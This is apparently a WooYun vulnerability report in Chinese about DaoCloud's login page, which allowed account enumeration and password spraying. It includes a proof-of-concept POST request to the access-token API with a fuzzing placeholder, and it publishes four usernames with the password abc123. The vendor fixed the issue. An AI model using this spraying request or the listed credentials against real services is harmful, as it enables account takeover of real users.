DaoCloud可批量扫号/可破解/附账号密码

编号223453
Urlhttp://www.wooyun.org/bug.php?action=view&id=223453
漏洞状态厂商已经修复
漏洞标题DaoCloud可批量扫号/可破解/附账号密码
漏洞类型账户体系控制不严
厂商daocloud.io
白帽子UltraEdit
提交日期2016-06-28 03:18:00
公开日期2016-06-28 10:28:00
修复时间2016-06-28 10:28:00
确认时间2016-06-28 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank3
漏洞简介
DaoCloud可批量扫号,可破解,附账号密码
漏洞细节

DaoCloud登陆页面处,可批量扫描已注册用户

https://account.daocloud.io/signin


账号

账号:just密码:abc123
账号:kane密码:abc123
账号:novice密码:abc123
账号:snoopy密码:abc123


由于规则较少且不常用,故只扫描出这些.

POC

提交地址:

POST /access-token HTTP/1.1
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=utf-8
Referer: https://account.daocloud.io/signin
Accept-Language: zh-CN
Origin: https://account.daocloud.io
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Host: api.daocloud.io
Content-Length: 51
Connection: close
Cache-Control: no-cache
{"email_or_mobile":"§Wooyun§","password":"abc123"}


No:1登陆页面处,扫描已注册用户

QQ截图20160626200150.png


QQ截图20160626200308.png


QQ截图20160626200317.png


No:2成功扫描出来的账户

QQ截图20160626200413.png


No:3成功登陆某个用户的页面

QQ截图20160626200435.png


QQ截图20160626200511.png


QQ截图20160626200516.png


QQ截图20160626200523.png


QQ截图20160626200537.png


QQ截图20160626200609.png


修复方案

状态信息 2016-06-28: 细节已通知厂商并且等待厂商处理中
2016-06-28: 厂商已经确认,细节仅向厂商公开
2016-06-28: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复非常感谢,现在已经修复!
回应信息危害等级:低漏洞Rank:3 确认时间:2016-06-28 10:26